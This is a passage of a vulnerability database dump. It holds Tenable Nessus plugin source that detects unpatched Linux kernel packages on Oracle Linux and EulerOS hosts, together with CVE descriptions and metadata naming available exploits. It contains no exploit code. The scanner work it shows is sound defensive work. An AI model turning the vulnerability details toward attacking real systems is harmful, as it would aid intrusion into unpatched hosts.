value.\n (CVE-2013-4587)\n\n - The mISDN_sock_recvmsg function in drivers/isdn/mISDN/socket.c in the Linux kernel before 3.12.4 does not\n ensure that a certain length value is consistent with the size of an associated data structure, which\n allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or\n (3) recvmsg system call. (CVE-2013-7266)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2014-3034.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0049\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/11/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-35.el6uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:dtrace-modules-provider-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"linux_alt_patch_detect.nasl\", \"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('ksplice.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 6', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\nif ('x86_64' >!< cpu) audit(AUDIT_ARCH_NOT, 'x86_64', cpu);\n\nvar machine_uptrack_level = get_one_kb_item('Host/uptrack-uname-r');\nif (machine_uptrack_level)\n{\n var trimmed_uptrack_level = ereg_replace(string:machine_uptrack_level, pattern:\"\\.(x86_64|i[3-6]86|aarch64)$\", replace:'');\n var fixed_uptrack_levels = ['3.8.13-35.el6uek'];\n foreach var fixed_uptrack_level ( fixed_uptrack_levels ) {\n if (rpm_spec_vers_cmp(a:trimmed_uptrack_level, b:fixed_uptrack_level) >= 0)\n {\n audit(AUDIT_PATCH_INSTALLED, 'KSplice hotfix for ELSA-2014-3034');\n }\n }\n __rpm_report = 'Running KSplice level of ' + trimmed_uptrack_level + ' does not meet the minimum fixed level of ' + join(fixed_uptrack_levels, sep:' / ') + ' for this advisory.\\n\\n';\n}\n\nvar kernel_major_minor = get_kb_item('Host/uname/major_minor');\nif (empty_or_null(kernel_major_minor)) exit(1, 'Unable to determine kernel major-minor level.');\nvar expected_kernel_major_minor = '3.8';\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, 'running kernel level ' + expected_kernel_major_minor + ', it is running kernel level ' + kernel_major_minor);\n\nvar pkgs = [\n {'reference':'dtrace-modules-3.8.13-35.el6uek-0.4.3-4.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dtrace-modules-headers-0.4.3-4.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'dtrace-modules-provider-headers-0.4.3-4.el6', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'kernel-uek-3.8.13-35.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-3.8.13'},\n {'reference':'kernel-uek-debug-3.8.13-35.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-3.8.13'},\n {'reference':'kernel-uek-debug-devel-3.8.13-35.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-debug-devel-3.8.13'},\n {'reference':'kernel-uek-devel-3.8.13-35.el6uek', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-devel-3.8.13'},\n {'reference':'kernel-uek-doc-3.8.13-35.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-doc-3.8.13'},\n {'reference':'kernel-uek-firmware-3.8.13-35.el6uek', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'kernel-uek-firmware-3.8.13'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'dtrace-modules-3.8.13-35.el6uek / dtrace-modules-headers / dtrace-modules-provider-headers / etc');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:22:29", "description": "According to the versions of the kernel packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities :\n\n - The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7265)\n\n - The mISDN_sock_recvmsg function in drivers/isdn/mISDN/socket.c in the Linux kernel before 3.12.4 does not ensure that a certain length value is consistent with the size of an associated data structure, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7266)\n\n - The atalk_recvmsg function in net/appletalk/ddp.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7267)\n\n - The ipx_recvmsg function in net/ipx/af_ipx.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7268)\n\n - The nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7269)\n\n - The packet_recvmsg function in net/packet/af_packet.c in the Linux kernel before 3.12.4 updates a certain length value before ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7270)\n\n - The x25_recvmsg function in net/x25/af_x25.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7271)\n\n - The dgram_recvmsg function in net/ieee802154/dgram.c in the Linux kernel before 3.12.4 updates a certain length value without ensuring that an associated data structure has been initialized, which allows local users to obtain sensitive information from kernel stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call.(CVE-2013-7281)\n\n - A NULL pointer dereference flaw was found in the rds_ib_laddr_check() function in the Linux kernel's implementation of Reliable Datagram Sockets (RDS). A local, unprivileged user could use this flaw to crash the system.(CVE-2013-7339)\n\n - A flaw was found in the way the Linux kernel's Crypto subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed kernel module, and thus increase the attack surface of the running kernel.(CVE-2013-7421)\n\n - A flaw was found in the Linux kernel's implementation of Unix sockets. A server polling for client-socket data could put the peer socket on a wait list the peer socket could then close the connection, making the reference on the wait list no longer valid. This could lead to bypassing the permissions on a Unix socket and packets being injected into the stream, and could also panic the machine (denial of service).(CVE-2013-7446)\n\n - The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter.(CVE-2014-0038)\n\n - Buffer overflow in the complete_emulated_mmio function in arch/x86/kvm/x86.c in the Linux kernel before 3.13.6 allows guest OS users to execute arbitrary code on the host OS by leveraging a loop that triggers an invalid memory copy affecting certain cancel_work_item data.(CVE-2014-0049)\n\n - The cifs_iovec_write function in fs/cifs/file.c in the Linux kernel through 3.13.5 does not properly handle uncached write operations that copy fewer than the requested number of bytes, which allows local users to obtain sensitive information from kernel memory, cause a denial of service (memory corruption and system crash), or possibly gain privileges via a writev system call with a crafted pointer.(CVE-2014-0069)\n\n - drivers/vhost/net.c in the Linux kernel before 3.13.10, when mergeable buffers are disabled, does not properly validate packet lengths, which allows guest OS users to cause a denial of service (memory corruption and host OS crash) or possibly gain privileges on the host OS via crafted packets, related to the handle_rx and get_rx_bufs functions.(CVE-2014-0077)\n\n - Race condition in the inet_frag_intern function in net/ipv4/inet_fragment.c in the Linux kernel through 3.13.6 allows remote attackers to cause a denial of service (use-after-free error) or possibly have unspecified other impact via a large series of fragmented ICMP Echo Request packets to a system with a heavy CPU load.(CVE-2014-0100)\n\n - A flaw was found in the way the Linux kernel processed an authenticated COOKIE_ECHO chunk during the initialization of an SCTP connection. A remote attacker could use this flaw to crash the system by initiating a specially crafted SCTP handshake in order to trigger a NULL pointer dereference on the system.(CVE-2014-0101)\n\n - The keyring_detect_cycle_iterator function in security/keys/keyring.c in the Linux kernel through 3.13.6 does not properly determine whether keyrings are identical, which allows local users to cause a denial of service (OOPS) via crafted keyctl commands.(CVE-2014-0102)\n\n - Use-after-free vulnerability in the skb_segment function in net/core/skbuff.c in the Linux kernel through 3.13.6 allows attackers to obtain sensitive information from kernel memory by leveraging the absence of a certain orphaning operation.(CVE-2014-0131)\n\n - The ioapic_deliver function in virt/kvm/ioapic.c in the Linux kernel through 3.14.1 does not properly validate the kvm_irq_delivery_to_apic return value, which allows guest OS users to cause a denial of service (host OS crash) via a crafted entry in the redirection table of an I/O APIC. NOTE: the affected code was moved to the ioapic_service function before the vulnerability was announced.(CVE-2014-0155)\n\n - It was found that the permission checks performed by the Linux kernel when a netlink message was received were not sufficient. A local, unprivileged user could potentially bypass these restrictions by passing a netlink socket as stdout or stderr to a more privileged process and altering the output of this process.(CVE-2014-0181)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H"}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1477)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-7265", "CVE-2013-7266", "CVE-2013-7267", "CVE-2013-7268", "CVE-2013-7269", "CVE-2013-7270", "CVE-2013-7271", "CVE-2013-7281", "CVE-2013-7339", "CVE-2013-7421", "CVE-2013-7446", "CVE-2014-0038", "CVE-2014-0049", "CVE-2014-0069", "CVE-2014-0077", "CVE-2014-0100", "CVE-2014-0101", "CVE-2014-0102", "CVE-2014-0131", "CVE-2014-0155", "CVE-2014-0181"], "modified": "2021-02-09T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-tools-libs-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:uvp:3.0.1.0"], "id": "EULEROS_SA-2019-1477.NASL", "href": "https://www.tenable.com/plugins/nessus/124801", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124801);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/09\");\n\n script_cve_id(\n \"CVE-2013-7265\",\n \"CVE-2013-7266\",\n \"CVE-2013-7267\",\n \"CVE-2013-7268\",\n \"CVE-2013-7269\",\n \"CVE-2013-7270\",\n \"CVE-2013-7271\",\n \"CVE-2013-7281\",\n \"CVE-2013-7339\",\n \"CVE-2013-7421\",\n \"CVE-2013-7446\",\n \"CVE-2014-0038\",\n \"CVE-2014-0049\",\n \"CVE-2014-0069\",\n \"CVE-2014-0077\",\n \"CVE-2014-0100\",\n \"CVE-2014-0101\",\n \"CVE-2014-0102\",\n \"CVE-2014-0131\",\n \"CVE-2014-0155\",\n \"CVE-2014-0181\"\n );\n script_bugtraq_id(\n 64677,\n 64739,\n 64741,\n 64742,\n 64743,\n 64744,\n 64746,\n 64747,\n 65255,\n 65588,\n 65909,\n 65943,\n 65952,\n 65961,\n 66101,\n 66351,\n 66678,\n 66688,\n 67034,\n 72322\n );\n\n script_name(english:\"EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1477)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization installation on the remote host is affected by\nthe following vulnerabilities :\n\n - The pn_recvmsg function in net/phonet/datagram.c in the\n Linux kernel before 3.12.4 updates a certain length\n value before ensuring that an associated data structure\n has been initialized, which allows local users to\n obtain sensitive information from kernel stack memory\n via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system\n call.(CVE-2013-7265)\n\n - The mISDN_sock_recvmsg function in\n drivers/isdn/mISDN/socket.c in the Linux kernel before\n 3.12.4 does not ensure that a certain length value is\n consistent with the size of an associated data\n structure, which allows local users to obtain sensitive\n information from kernel memory via a (1) recvfrom, (2)\n recvmmsg, or (3) recvmsg system call.(CVE-2013-7266)\n\n - The atalk_recvmsg function in net/appletalk/ddp.c in\n the Linux kernel before 3.12.4 updates a certain length\n value without ensuring that an associated data\n structure has been initialized, which allows local\n users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg\n system call.(CVE-2013-7267)\n\n - The ipx_recvmsg function in net/ipx/af_ipx.c in the\n Linux kernel before 3.12.4 updates a certain length\n value without ensuring that an associated data\n structure has been initialized, which allows local\n users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg\n system call.(CVE-2013-7268)\n\n - The nr_recvmsg function in net/netrom/af_netrom.c in\n the Linux kernel before 3.12.4 updates a certain length\n value without ensuring that an associated data\n structure has been initialized, which allows local\n users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg\n system call.(CVE-2013-7269)\n\n - The packet_recvmsg function in net/packet/af_packet.c\n in the Linux kernel before 3.12.4 updates a certain\n length value before ensuring that an associated data\n structure has been initialized, which allows local\n users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg\n system call.(CVE-2013-7270)\n\n - The x25_recvmsg function in net/x25/af_x25.c in the\n Linux kernel before 3.12.4 updates a certain length\n value without ensuring that an associated data\n structure has been initialized, which allows local\n users to obtain sensitive information from kernel\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg\n system call.(CVE-2013-7271)\n\n - The dgram_recvmsg function in net/ieee802154/dgram.c in\n the Linux kernel before 3.12.4 updates a certain length\n value without ensuring that an associated data\n structure has been initialized, which allows local\n users to obtain sensitive information from kernel stack\n memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg\n system call.(CVE-2013-7281)\n\n - A NULL pointer dereference flaw was found in the\n rds_ib_laddr_check() function in the Linux kernel's\n implementation of Reliable Datagram Sockets (RDS). A\n local, unprivileged user could use this flaw to crash\n the system.(CVE-2013-7339)\n\n - A flaw was found in the way the Linux kernel's Crypto\n subsystem handled automatic loading of kernel modules.\n A local user could use this flaw to load any installed\n kernel module, and thus increase the attack surface of\n the running kernel.(CVE-2013-7421)\n\n - A flaw was found in the Linux kernel's implementation\n of Unix sockets. A server polling for client-socket\n data could put the peer socket on a wait list the peer\n socket could then close the connection, making the\n reference on the wait list no longer valid. This could\n lead to bypassing the permissions on a Unix socket and\n packets being injected into the stream, and could also\n panic the machine (denial of service).(CVE-2013-7446)\n\n - The compat_sys_recvmmsg function in net/compat.c in the\n Linux kernel before 3.13.2, when CONFIG_X86_X32 is\n enabled, allows local users to gain privileges via a\n recvmmsg system call with a crafted timeout pointer\n parameter.(CVE-2014-0038)\n\n - Buffer overflow in the complete_emulated_mmio function\n in arch/x86/kvm/x86.c in the Linux kernel before 3.13.6\n allows guest OS users to execute arbitrary code on the\n host OS by leveraging a loop that triggers an invalid\n memory copy affecting certain cancel_work_item\n data.(CVE-2014-0049)\n\n - The cifs_iovec_write function in fs/cifs/file.c in the\n Linux kernel through 3.13.5 does not properly handle\n uncached write operations that copy fewer than the\n requested number of bytes, which allows local users to\n obtain sensitive information from kernel memory, cause\n a denial of service (memory corruption and system\n crash), or possibly gain privileges via a writev system\n call with a crafted pointer.(CVE-2014-0069)\n\n - drivers/vhost/net.c in the Linux kernel before 3.13.10,\n when mergeable buffers are disabled, does not properly\n validate packet lengths, which allows guest OS users to\n cause a denial of service (memory corruption and host\n OS crash) or possibly gain privileges on the host OS\n via crafted packets, related to the handle_rx and\n get_rx_bufs functions.(CVE-2014-0077)\n\n - Race condition in the inet_frag_intern function in\n net/ipv4/inet_fragment.c in the Linux kernel through\n 3.13.6 allows remote attackers to cause a denial of\n service (use-after-free error) or possibly have\n unspecified other impact via a large series of\n fragmented ICMP Echo Request packets to a system with a\n heavy CPU load.(CVE-2014-0100)\n\n - A flaw was found in the way the Linux kernel processed\n an authenticated COOKIE_ECHO chunk during the\n initialization of an SCTP connection. A remote attacker\n could use this flaw to crash the system by initiating a\n specially crafted SCTP handshake in order to trigger a\n NULL pointer dereference on the system.(CVE-2014-0101)\n\n - The keyring_detect_cycle_iterator function in\n security/keys/keyring.c in the Linux kernel through\n 3.13.6 does not properly determine whether keyrings are\n identical, which allows local users to cause a denial\n of service (OOPS) via crafted keyctl\n commands.(CVE-2014-0102)\n\n - Use-after-free vulnerability in the skb_segment\n function in net/core/skbuff.c in the Linux kernel\n through 3.13.6 allows attackers to obtain sensitive\n information from kernel memory by leveraging the\n absence of a certain orphaning\n operation.(CVE-2014-0131)\n\n - The ioapic_deliver function in virt/kvm/ioapic.c in the\n Linux kernel through 3.14.1 does not properly validate\n the kvm_irq_delivery_to_apic return value, which allows\n guest OS users to cause a denial of service (host OS\n crash) via a crafted entry in the redirection table of\n an I/O APIC. NOTE: the affected code was moved to the\n ioapic_service function before the vulnerability was\n announced.(CVE-2014-0155)\n\n - It was found that the permission checks performed by\n the Linux kernel when a netlink message was received\n were not sufficient. A local, unprivileged user could\n potentially bypass these restrictions by passing a\n netlink socket as stdout or stderr to a more privileged\n process and altering the output of this\n process.(CVE-2014-0181)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1477\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a2db0b02\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0100\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-862.14.1.6_42\",\n \"kernel-devel-3.10.0-862.14.1.6_42\",\n \"kernel-headers-3.10.0-862.14.1.6_42\",\n \"kernel-tools-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-3.10.0-862.14.1.6_42\",\n \"kernel-tools-libs-devel-3.10.0-862.14.1.6_42\",\n \"perf-3.10.0-862.14.1.6_42\",\n \"python-perf-3.10.0-862.14.1.6_42\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:22:51", "description": "According to the versions of the kernel packages installed, the EulerOS Virtualization for ARM 64 installation on the remote host is affected by the following vulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system:\n memory allocation, process allocation, device input and output, etc.Security Fix(es):The walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.(CVE-2017-16994)In the Linux kernel before 4.7, the amd_gpio_remove function in drivers/pinctrl/pinctrl-amd.c calls the pinctrl_unregister function, leading to a double free.(CVE-2017-18174)In the Linux kernel through 4.20.11, af_alg_release() in crypto/af_alg.c neglects to set a NULL value for a certain structure member, which leads to a use-after-free in 